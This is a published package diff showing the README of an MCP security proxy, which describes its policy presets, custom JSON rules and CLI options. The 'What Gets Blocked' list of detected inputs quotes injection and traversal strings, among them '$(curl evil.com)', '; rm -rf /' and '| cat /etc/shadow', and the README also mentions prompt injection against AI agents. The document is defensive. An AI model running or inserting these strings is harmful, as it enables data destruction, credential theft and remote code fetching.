npm - @solongate/proxy - Versions diffs - 0.1.0 - Mend

@solongate/proxy 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (4) hide show

package/README.md ADDED Viewed

@@ -0,0 +1,136 @@
+# @solongate/proxy
+**MCP Security Proxy** — Protect any MCP server with security policies, input validation, rate limiting, and audit logging. Zero code changes required.
+```
+Claude ──(stdio)──> SolonGate Proxy ──(stdio)──> MCP Server
+                         │
+                    [rate limit]
+                    [input guard]
+                    [policy eval]
+                    [audit log]
+```
+## Quick Start
+### Automatic Setup
+Run this in your project directory (where your `.mcp.json` lives):
+```bash
+npx @solongate/proxy init --all
+```
+Restart Claude Code / Claude Desktop. Done.
+### Manual Setup
+Edit your `.mcp.json`:
+```json
+{
+  "mcpServers": {
+    "my-server": {
+      "command": "npx",
+      "args": [
+        "@solongate/proxy",
+        "--policy", "restricted",
+        "--",
+        "node", "./my-server/dist/index.js"
+      ]
+    }
+  }
+}
+```
+## Policy Presets
+| Preset | Description |
+|--------|-------------|
+| `restricted` | Blocks shell/exec/eval, allows reads and writes **(recommended)** |
+| `read-only` | Only allows read/list/get/search/query operations |
+| `permissive` | Allows all tools, still enforces input validation |
+| `deny-all` | Blocks all tool calls (emergency lockdown) |
+## What Gets Blocked
+**Input Guard** (always active):
+- Path traversal: `../../etc/passwd`
+- Shell injection: `; rm -rf /`, `` `whoami` ``, `$(curl evil.com)`
+- Pipe injection: `| cat /etc/shadow`
+- Oversized inputs (DoS prevention)
+**Policy Engine** (configurable):
+- Shell execution tools (`shell_exec`, `run_command`, etc.)
+- Eval/exec tools
+- Web fetch (data exfiltration prevention)
+- Any tool matching your custom patterns
+## Custom Policies
+Create a JSON policy file:
+```json
+{
+  "id": "my-policy",
+  "name": "My Custom Policy",
+  "version": 1,
+  "rules": [
+    {
+      "id": "deny-exec",
+      "effect": "DENY",
+      "priority": 100,
+      "toolPattern": "*exec*",
+      "permission": "EXECUTE",
+      "minimumTrustLevel": "UNTRUSTED",
+      "enabled": true
+    },
+    {
+      "id": "allow-rest",
+      "effect": "ALLOW",
+      "priority": 1000,
+      "toolPattern": "*",
+      "permission": "EXECUTE",
+      "minimumTrustLevel": "UNTRUSTED",
+      "enabled": true
+    }
+  ]
+}
+```
+```bash
+npx @solongate/proxy --policy ./my-policy.json -- node my-server.js
+```
+## CLI Options
+```
+solongate-proxy [options] -- <server-command> [args...]
+Options:
+  --policy <preset|file>   Policy preset or JSON file (default: restricted)
+  --name <name>            Proxy display name
+  --verbose                Show detailed error messages
+  --no-input-guard         Disable input validation
+  --rate-limit <n>         Per-tool rate limit (calls/min)
+  --global-rate-limit <n>  Global rate limit (calls/min)
+  --config <file>          Load full config from JSON file
+```
+## Restore Original Config
+```bash
+npx @solongate/proxy init --restore
+```
+## Why SolonGate?
+MCP servers give AI agents direct access to your system — shell commands, file system, databases, network. A single prompt injection attack can turn your AI assistant into an attacker.
+SolonGate sits between the AI client and the MCP server, enforcing security policies on every tool call before it reaches the server.
+Learn more at [solongate.com](https://solongate.com)
+## License
+MIT